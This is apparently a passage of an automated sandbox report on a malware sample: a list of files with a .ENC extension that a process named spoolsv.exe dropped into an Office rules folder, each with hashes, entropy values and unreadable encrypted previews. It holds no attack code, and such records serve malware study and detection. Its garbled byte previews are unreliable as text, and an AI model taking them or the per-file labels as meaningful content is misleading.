                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6048
                                                                                                                                                                                                                                                      Entropy (8bit):7.968569913294309
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/8noSL7G+A4j7beAadDrQN805Op2+s/70sg4Z0fOQlK2PMvxipC832XrE:/EoSFj7LUHr05R+s/wsgq0mQtQxix32Y
                                                                                                                                                                                                                                                      MD5:D41215EDE8B6BD3250D8E1CAF7C5763A
                                                                                                                                                                                                                                                      SHA1:87E0ADE4B4957CC564D6F1697CEC3BB9ADBABD2E
                                                                                                                                                                                                                                                      SHA-256:A75974D8E242AB9B04858B8137F461C80014E03DB6F3E187BEC0A29582D19920
                                                                                                                                                                                                                                                      SHA-512:5F5B9B1CDA7281EC05D14A36E973F6AFD72D748057FF567BA26E9E3CFDA32738843D694C394813C74699CE44634146E22F76289115BD19CBC93A7D51152A138C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...Ls....n&_v..1=y%.2>.(.m.m.ANW...l..`.T..pM.> ....i...49p.(.5.."......@.tr.<.iX._.$...0.Bj...]...}.i.......;..fjc..X..{.X(.W3...x3n}F..H.-...;R..:A.S.R.-J........9!.....8....|{...-.......S..HK...;x....~.M....>.....D.)`...n..|UDB.a..W.Mj....A.7ur....r..g...:.R{E..Wl..4..t..ebs..n._.."@.X.m.....[..}O ...._.)....JC...l...)i..(}...<.....Y....`.[..F|,.8Qj...+....i.......3....A.<.P....a$...{....+..0...._kw.tss.M+.5...L..q....8n....5.[/..jS. t.!.vn"......n...2V....;.>P..p....*sz?...M.m...q..bT%KA.'&....Z.xZ&..k?z(K...2...\.........nc,.. ..%..v.x..PNhu.6.....kGMD...3...;.v(W...c..]..)......b.^Hq.....i...Ej.mAd...m..TW.S.$PQ.x.<D.......U..AN...H.`CV.!|.......\..=....l."7H.....[....2...3....V*Tq.[.....@|V..T.*eF....1.....xus..k.N......Jt.g..._...^.K..^.o..qI..c.}S..>...X>.QSE..w..v\..7V...|.V._].c.C.,.e.ZdWtO.._...;a..n...T...%Z..M..W)#).#Z..D.=...X.."..7ES:..iw..S.YcC.gN..:6..k...n/.n...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230174v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2160
                                                                                                                                                                                                                                                      Entropy (8bit):7.907224002433935
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/PvAaamy5yE+IcPIx3wTVFFv3XV1JAt0A7fIZge:HvA03YcawbFdMWA7fgge
                                                                                                                                                                                                                                                      MD5:0E94CF0EF32F11B102743172AAC7B587
                                                                                                                                                                                                                                                      SHA1:E740CCFF112115A427BEEBED928DA8A539FFB59E
                                                                                                                                                                                                                                                      SHA-256:A0DD4FBC694E6B6DF14A6199CFAA83201B6094C3095075A1FAB26A0C0637DD88
                                                                                                                                                                                                                                                      SHA-512:6EF20A8BF2A0577A352927FC6E695BBA52DD8FF0964348CAA4D6760129E61EF35323448389913554A592D08A2401E2AEE7F7AF7CF2779B9EAC582FF5E820CF8B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.-.Q.8b..R(.s8....A..jc[n.6.5.....<.iI.~......[..-Rl..8S..@.!..)4.C...c.....Yk...>..\z.l.Pi4.a."...m.V.M...z..4...9..}..].......V)#.q.V.._............].G{).4......Qk.......hx ..a`.f....H..Fb...e..I.V...%..:3..Nqx....r.UP...]..b.0....9......c...h.1;&*/.3.l.9.w...N........x.{@.....+.*........c...B.N.!D.. yM....9..WB....a....l........1...+'...^............u..i..mp.I.|..`.7nY#]o..i.'.H..X..](x.......*.8.:.i.Gu.<&.y.RpO.zi... .+.5......Xm..n.(+...W.......2.c.\%#h..J.Z.........&l._..x.... ob.p...9.$X.".z..9.}..`....+..i..y.8....'Z..&..x.y"r5G...?.p......E.u..E(...!......<......3..r.....)..N.... 45.m3.....>$.%W...f.g....K....@.....%..qy.....g.....\....b.....nUW...N.....}....|...oh.:3...d1U]......-8~..Q...y...h..\&.le.K...q..C.2j....I.@.P.Q...%...K.f.7^@6T+...Y..Zx..d..UK)..9Ld....BnJ?3..2..M.'TB.Y...S.."..sz]...-.Z.F.nHGt.w.....`.*l[..-....Y..k.(....Z..).N..'t....ua_H.Q.y>...CF............%.v).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule460008v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.563803094594704
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmq2G2sy2i16WPauVCjatvKURTRwivdac:+X5s4QWhwgygTNvv
                                                                                                                                                                                                                                                      MD5:0BBE8A08732282FDE1BA7AB906CB67DA
                                                                                                                                                                                                                                                      SHA1:FE9AB5EE7571D7654B956ABD514100AD1F55AB02
                                                                                                                                                                                                                                                      SHA-256:9A01EC8CCFAE1D56C7234294FA7D6793C33C16A7F61C2B16699CF8D061AFC95D
                                                                                                                                                                                                                                                      SHA-512:5B0D480A1FD50CFC81898A314BD64BB2A3449F930FD2AE138447237D3F123F6277944366A819B2B1D4EB7B729E13893DB8A862DE74311FB2EE9DC7BB368B60F3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..5d..l.}(U.o.Wa,.}.h...Q..#.g.f.w...,...p..).&.s.zh\u.r...yo.KVB8.{..w@....%%. H..W.G;_Jei"U|..D.c.fRp...'....O..2..\.wge.....\.w..iQ...}.Rt.....(.?..o.t.d.2+21..........;o3.....(.,KnJ. .n............Q3N.I.,./:l9.I..6.4e..N.M....\..*..0K|Rqn.<E..-.....}.W.~H.q..X6.|.D.UqG<.6....MG.#.Rq....e........f.......a.........P.i.m.fCZ#J...K.].l....3.{A..r........_.S....`v..x.... ..i.\`;?..}&..1.Y...e...s2AP.....#.OBo.k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule460009v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.5088721402130805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fmqGaoJq0E6oDyvdE3ui/OnOfCvVawHS19XytbbGZ2GMNTJharugkajqlJjkksef:fmqQY0Ro33uc0OfnwHs9ypbGQhaugpex
                                                                                                                                                                                                                                                      MD5:957436EB5EC83BA1BDF2E542ACA4540C
                                                                                                                                                                                                                                                      SHA1:2E9634C72F4724D0392A5008A43C76AF372D086E
                                                                                                                                                                                                                                                      SHA-256:0344C46B8D39348C7B685FAC56C42CD4E6B8F7504AB5F2D26A29230FC6ACC013
                                                                                                                                                                                                                                                      SHA-512:209C45E161FFF2F6BB7203DB9EC92A67DAF084C91409A8021F3694484717BD33AF59C3166D181AC19D013E0053127EC905142E131C590090EEDD97C69F0C2783
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..5d..l.}(U.o.Wa,.JTU..........n..@..&'F,.>m...U.........v3...m...#s.pk?)t%.p..7.<..\8...tT..*....}...&.X...E....@....7._}...Nq6..t.mC.......O.0..../r.[....)..p_.ivx.. ......u..%>..j{./.......A.Y....{|#.....).j.a.8F....?..w..n.....U...+.f..YWS./...h....sFS2..Zt7....%xD....F...F...+....>EA#c.....0......v...@;....6.wC{.*..PYC..,..;.....U....@QU.,..4.Lt.:cwZ%~.M7..h..w,....C^.5.!1.i..>z

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700000v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                                                                                                      Entropy (8bit):7.89352946875048
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/RypIPJWkqCZW9FnSEqzwpX0xj1+bn1ZwRuJ:JyM/fZW9lSEqzwaxEbnqY
                                                                                                                                                                                                                                                      MD5:F85531DB93D52C4CA184CE15CAE498A2
                                                                                                                                                                                                                                                      SHA1:9B20A21B8321D34C24912E8D0BFBAC7F398E180C
                                                                                                                                                                                                                                                      SHA-256:C0CF2C98D3D97E5C8B5D031E41E749C82AC9319949FDF2516147A4EF776F57F4
                                                                                                                                                                                                                                                      SHA-512:82F1DF55D12192530E399DB468EE5BB1B5CF8CA42CF1857DB9765555CC22C85697B73F4DFA88204F2BE16CB41CFBAD5AB0AC57357E6774CC7FA0361B2DEA9451
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.G....(@I.+.......#.e.....w\.7.....F.._........" '.....P...hG2,.:;.C.j.O.kU.JE..Iv.&b....3........sL..{p.P6<P....-;.=_d...x..k+A<[a.6n\K.b.X..?4..UV.j.y...r?..]o......h"....}6...X'....Z.3.wu.....h.H......V...E..N....U5.XW...VLJ-n2.9dn.&Qi..H....ds........\.J..c....g...-sX..5.....Lm...L.....w..(..7#....^.v|..|$..)Ws'e2.;.... 7.....*}Q.Z...jE..1'..>..`E....P/.N.@.d..B.$...A...,.i#........5.{Gl........<A...b....mb..z....>!...tD;....C..S.4..n.?/KMN.(-....a.noS{..lI..\.x.d....!..E=.`Iid.{.;E..;...[.J@z.F..r..T...a..za..[w.......Lre.k K..&m.3.....4.....H ...m2..nw. {O..b70c..\1m..h._.t.......U.$@...z.f7.K......@.T.p......;.....8.DNx....k'.km.*...z.&....Q..7........v...n`l.oM0.2...7Pjp.aJ.b]...Q_nu...(T..@/Y...$...?.....e............>N......J...........r{n.........k.*..../......I4..z.V.6.......\.]..K[...}..F...5.....C.G..W.=*.L.I.?&|t.s'..h..B...xY.....~.4...P.!..T.......3..ak....f.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700001v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                                                                                                      Entropy (8bit):7.901212159163616
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/GsL61yRGbIMeH6SaHHEl8+t/BGiTgibY7ouiqN+jtOdZUX7:udEGbIMQ5kktG57ozqN+jtsc
                                                                                                                                                                                                                                                      MD5:3957F279DBAE1C54CBC3FD3C3EB49C8F
                                                                                                                                                                                                                                                      SHA1:98CAB6229C7224570D170B4AB20C67E672D3E964
                                                                                                                                                                                                                                                      SHA-256:8473E5997B36056D38DFA56E06946921AD1A3FE750C4765C22CC24F1E47F3AB1
                                                                                                                                                                                                                                                      SHA-512:36619FC29D695B484F17DE636606BB7A1C8D571F5BD3E17D52F17A278DB4C44925F408E0AD67F85A1896BD665196655A415ADCEEC0A9BFDFDB24BC97777B71D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..<n.J..#5.o/....-........c..I.....El^.,..C........cA...x.4.Y...w...../.&.....2...}.....k.*|.^....,n.5.....D`..;.........oQ.7..J!...)b...B.%D..h....o.3JU.......1.m..V...z..._.{.bE.?.......,?1..?2.z..fC...>.K....B..u.xW.8..yA..gc..mI1rM..p5,q.(sD....W...a.e...j..a.gj.....dL...*.......n.s..A._...........6.A.:.F.N~..{.I..G.WD1.h...2.._6Q.=A.0""n+.ge>~..p..A.n...R>S.o..J.CR...^AR.z.I....6...0.~.q[v.T....3.n.D..J...i....'.z....3........O...G....O.RL......v).....F"..F.Q.]=..!B....+^..p.|3a..wa.7.7......Iblx....V...D0.....^...._.z.w'....'.%J..0...5.=A...!"..kz........i(.&.........h....s..-T..O<f.. @?W..jw..{......U.{...._.#z..YV._.dX.`.S...Q.".m..`w.p...F...K..g..z..._z....Z...I..0~....N@m$.<.....u3..e....SQ...!..z1..fH...9.:.:Qx...O3:..F ~!..D..@.?..q.B.`0.......z!irt}H...3...x.E... ...e....-..5....P2.!..k..j.E.t.*Qd..]S..F....Y. .[..Np...jG....wE....w.U..~4..f.r......F\$...5kKL.._.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70002v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.582596334130061
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmKB1ftpxf2rr3n95GQ+lpfGWL18grbAvj/TUIHFL0HuIDbl:+A/xANafGQ1tbG5lIOIDbl
                                                                                                                                                                                                                                                      MD5:F70F870D5678B2422E155312CFA8C7B7
                                                                                                                                                                                                                                                      SHA1:D32E1070ADCF66753FBCDB8368527D20655F4D2F
                                                                                                                                                                                                                                                      SHA-256:82317691EF6001B6EE0E1FBD090A3ADFFB864BEFBA95276E47F045AEEA979AD7
                                                                                                                                                                                                                                                      SHA-512:AA79B570A07ACF7C94441837D2B4E6F89A89CEE2E9C0168ECFACE4EAEBA3982E1B908134E7ED83872F14E936F24BFDA1562AC8DA2B1B3ABC5AA6CDAFFAB5CB6B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.`.....G...RM..h.."...I..../u. I.......`....L.a|C......d...qw)6..CQf.w'.V...r.?Y....K.....#|.V..a...r..g.I....y....'*|w..n[..T.........)B{......,.C...j7.StQ.l./...a...1..:...`0....UE...!.f..=u,.!^.&..d....r.N..5H..H.y=K.w.g...SgP(.h.......Q`->....@W... ..F,......GR.ENx..r...e.Y'...D..0..xn.`....j.sbN...n..$......vY..2!/L^_d.~NW.. ..4L.].,......Kb....C@n.%........K..z... ..*.&S.um...sw.=...l..8.A.$.r.H....R......f.z.hJnQ.Z.<.$4..S../1./...E{.n.Y...f.Kh..a..G..m4Y!.(-OwrO.>d..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70003v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):400
                                                                                                                                                                                                                                                      Entropy (8bit):7.475731229777153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fm7ozMYnZv4W8v7aWF8q0LIDS79ZiPQiU+E3RbXIdthwZbYzCSSYytex7u:fm+3v4W8v+C3DSBZUQizE39wkECJmx7u
                                                                                                                                                                                                                                                      MD5:E6D031C9439E8361D2633A5A3976F678
                                                                                                                                                                                                                                                      SHA1:76086E777315C5CA13FC5D02135413C64EEF84F4
                                                                                                                                                                                                                                                      SHA-256:B4ACC73DE998281CE5AF2EA4E6824DA4BB1B9A752E582D279655197A181C30DD
                                                                                                                                                                                                                                                      SHA-512:1D1C6033E434B636F179F3040D4A276175F4DCBAA026224DD99C3C06F65DCAFC11FD96DC3345DBAE7066DB8F56860C97991291A0C979271A27C5CD3779C74DB7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.p......?.EPj.|u.9..>V.5n.t....wr.R.6.Q!.B.g.+.....H..:...t.V!Cw...C..7h.y.%.6.t7....w.Hd.E\.]\!.N...|v.d...O..#..2..@....L24+.K...w....[.K.}t..-..7e..:.F..Z.....gy..*.=.:.....@....U4....@A.a........g.F.uw......F=.C...>...z...8..x..8...+..dirx._.........d_b[\......ox$.....i.....$.33.....D...N.D....9..\...Xc:.....3W.Q..e..!.....R....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700050v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.860110656588548
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/UGgXOt5GMrF43YhoX4LblUZe1WSIKhjoTlFVmGoAr4qD2dnR/eZ:/UGgX25zHhoX4LWQ5IKKnweE1R/Q
                                                                                                                                                                                                                                                      MD5:56C2CDFE243EFEF7CB8C637D8E2589A8
                                                                                                                                                                                                                                                      SHA1:913E5043D5A8CBF324C01FB2B9C4DC7DA2069B0B
                                                                                                                                                                                                                                                      SHA-256:A2AE32641D09EE0E7C4269C755005AFA68C02A7DBB623AAEBAFDCC56BF85518A
                                                                                                                                                                                                                                                      SHA-512:07BF109D569B8F021D0FC02AFEBCC5FF488C684405BFABA63175B18085CFB27F4851D811A7D3C9E9A2ACE0676A0D45E500D39CC7CE24687D521592A270E53B20
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..;.V^@.S..YS.....t.RgA.^.&A.O.n../.=B.....^..a7H.....8?......5....-N..;....Z..0..o......v.D...._O.yU..,H...8y..H....._...`9i...dq.]..9!.H..*.:...W.........T....kPry...Z0..H....tjR..X........J......q......d.y.;.....L....Kh3[...=..!..bd..:....f.-..c..d..SuJS...YI....A.C.:.s..ky-f.V...5'[.....6o0..Z$*.U....R.n.P.i....G.Jx...|k.9..`.h.:.....0...$.D..E.....Z..w..#@..B...#.'y.t.`.x.....Z....|.J.O1......C.....c...?..8.).D..9..tR..p..{......X.....+.....[......@g...o.UNZ...|......C..&_m...z...J...8......b...6X..\S.T..0y2..>.5...8....`...2...k...9|.....n...K.p......... ..T.{..|Z..LJO.p]....tX\........W..N.3;6V... ...G(.&).. ....Z.K.91.."..g.....bv...O.{.._.|.h.H...(....'G....97Wu.@e.~fh..G..........2..(...@...V.W...Z.r..b. ..b..$.v.ZH..-.V..v.....9T....c.#?..|....X.w.+..~...R1...........B..=..R..+?h<.E..w....3.R..I.....n..RO....o.+..;...,6...k.?...S.f..h......TV...V..e..9?...RU9.r....lNN# .}..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700051v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.854132753178441
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/SbtI4TfldnfEVFoXbqHLAj8UNkQB6osJ0J/SuSQL26D84bqb698Tlr:/cC4Hnf+orqHkQUNj6os+J6qB868lr
                                                                                                                                                                                                                                                      MD5:53EAC470ABD16DECFCE27AD51F03C186
                                                                                                                                                                                                                                                      SHA1:3B0AF0E552B5F63A10DFF5239F5645DB708B3700
                                                                                                                                                                                                                                                      SHA-256:1D5F7E69EDB6F5521EEDEDAD475CC9198315028A091DBA4BE18206CFE29B7879
                                                                                                                                                                                                                                                      SHA-512:49A5D062540D123108FD1200A89C450E9EF9112F765894C106115D527DEC180F47E2B2A03A8A15F09D90A59F0733E56DD279B315C33C618A1133AD6C8DE815FC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.g.5..,....N....+,.3|ws...qV..P.7.>B..n2...1'8r....s7QL.W ..S.d...SCs..A...e..^<.D.....,.U.0.F.-..$?..8.`...Z.;.O.L...,3...................v.........\`R...9.'jF(]~....=..`o..X,Z;).we...{.B>..#Og....^W.b.%..&..i.Y.2...;I.QPn....N%..A.B6.[.n*2:.A.........&..-...8h.<2(W.M......1.Dn..I....>H..U.4.I...d<"+6.s.."XA..F."..Yp..%i.........1..M:`...NP.%T..VW...`...++N1..>>......FG...4X|ep...Cv<.(.U..j...l.4b..8....U...f....2;@..0w...4.|.s....l.^..+..5.*.}.....f...T|[.._...X....9 ..4.D.3.kvG.@.Fy.g....v.J_..3SA.&P%....3...w.....?7.2.Y...d..,...~...oG.h.x..ev.;..n#.7...b./_R&CS....`..P..E.X..A.>..6..........R..Q2.i..z.Gh....t<.X.'/..w\.R..f.R(P;#..=...(N.....K...F.A..P.f...|.)vj...a! ....D...RZ..:...7v.`...;$.$J\XQj..n.....<.x.X,.F.s".FW/\..i..5O..=fupp..8f....\....G..b#...5..?..~...%T.`.7y....j.y.E..`.......j(...-..C0.Ro..l9W....&.A.&}Xf.~..q.bo.0.q......A.y.K.Y..,.:".|n.D..GUxP.PcsHz./.....^?.$.%.....W..S

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70006v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.605331413192797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmU87cNL8P1QN7IBYxJaH+5a2o2jmK8tQ/:+Hew1QNKYvcc22CK8C
                                                                                                                                                                                                                                                      MD5:174AB65A9D1AD9FAF579049433FC0762
                                                                                                                                                                                                                                                      SHA1:7CB11E66764562909D94EAC76706D50F85368619
                                                                                                                                                                                                                                                      SHA-256:B58E5F9B8D0346B05DFEAEE51A621F2B03C34F574D81CA70F68507BDAA8E4F81
                                                                                                                                                                                                                                                      SHA-512:176EAEBCC15C6025AC6D26FAB06C8976A300970CE5DCAD48FEBD092E4D53BB679F2581DD2CB64307A091ADE8C901664BA024810B9EB9BEBD7E312113B5CBC523
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.Ix-Bo8.g.gC..)..y>*,,...JM..jG.e...I....U.lv...gbc..4...[...].."..*.MZ..QU..;..?....>....t..:O..1..P..m<..wbTV..\.'..W6$....H`B...CJW.o....m..C.....y...ys..->.....M]......<..P8.Kc..P......Z...[..fl._.{..cK}...bXy......iF......3.S.H}G....:.,}.^.....g&....i*@/.Ok.@.|.r..Tp. ..z...,.G*.`S..^..,.Ph/....P.......Ny......H.D.c(..2~..".a!E5a8\L.q...p..L.;A....`..:.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.867106564893099
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/iqhQia9GcVVEY2G82HJcCYMm6k453k2ESL6iX9vV7VflPlnEP+lTVAA:/iqhxawcVCnn45lL6YZOupAA
                                                                                                                                                                                                                                                      MD5:D3C8C93D5BD21AB6BAC4A84FB05B0FD9
                                                                                                                                                                                                                                                      SHA1:47A0C2326925983E4A92B044721D6BD669240612
                                                                                                                                                                                                                                                      SHA-256:C801A23BDD5B7F9FB8903EF69EC94809B5078CF8984A81E3680E10BFEBA0C9DA
                                                                                                                                                                                                                                                      SHA-512:7F53C8F7E05DFA30F65C09C8A7131615AADF13DADE579AEDCC7AD063532ECE0C72ABF0C26569E36E58E5583B42A9176BA42F3BFE8D5DA50AD239C263328AEC6C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....Z.......43Wn].t.zz.`..d^.B.L-U.4...Z...K.....I.....@...6...\*t>..J...%.4.q...\m{d+.{.c..$.i.0W....w...r.xIx9Y.......Wn+.tX...>7..h..D.......e.....v....>.$|}(..V...y.N..[.V-V.3~e..g.5..~.h,.. ......Zp.Q.U..|Ns.O...-t....4].c.....w..Lo....&"...(0..0..B..Em....7l.*.MN.......(KD...p.n..0" ..&...G=U.O.....E.p...G..9.....jqc:...v.UYz.O...I.X^.'.0...6.p.!...]...e?C...q].t....o>..d.{.......l|@...`o.a'.t.,.).]Vef.^E.....XV:...9..oX..[.!h\6..?.@...`...%...4.....I.Z.w..E.t...........~...+..%..(..W..=.......O6...].r.3."].N..mp..(...|..........}Ua.-Kw..d.46.....cK..n.-N.2../..p..Dl.-[.. ...mQ,...f.T~.Be./U./..U........Pz...V.C...@)C........<...P...[...K.n...$.......60..@......T..A.9,:..`...w..pp....Eyj...a..-.o?.<...Cc..]....."%.t\.&:X......H.......!4.0.......b.GPDhcW=6.;`.......:o.....V4AL.'.H...^.q.J........@..ZvQb....R...3G.qT#.,....-.-.!*....x.C..&.}.........|u....oYB}........b^#.1.k....8...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.864261927654094
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/tXSbOQj8uvHtr53OlSEpCPo74nMPqvwVg4RN0OElCwEZVuAfP0ToaS+fC8MThCw:/lkHtlHpwVVRN0PlCwEruAE8ZKC8uL/
                                                                                                                                                                                                                                                      MD5:E10174EEC491E210F3C2F3C534F297FA
                                                                                                                                                                                                                                                      SHA1:FDE2759DDBC26C5F8722DD428FB57FC902D4DBBB
                                                                                                                                                                                                                                                      SHA-256:27E1C88D8471C6EFD7E1239855ACF212098FB27E5C84857C278FB337A7448D98
                                                                                                                                                                                                                                                      SHA-512:73EB0384B99EBCB7D6939E5B4A4812FA0C6CD9F2253442191DAF6C844F7F93A6B47E344C2E08FAA84C63648B766D558A23A14A310062B842A0DDC2FC2DB2A5A3
                                                                                                                                                                                                                                                      Malicious:false
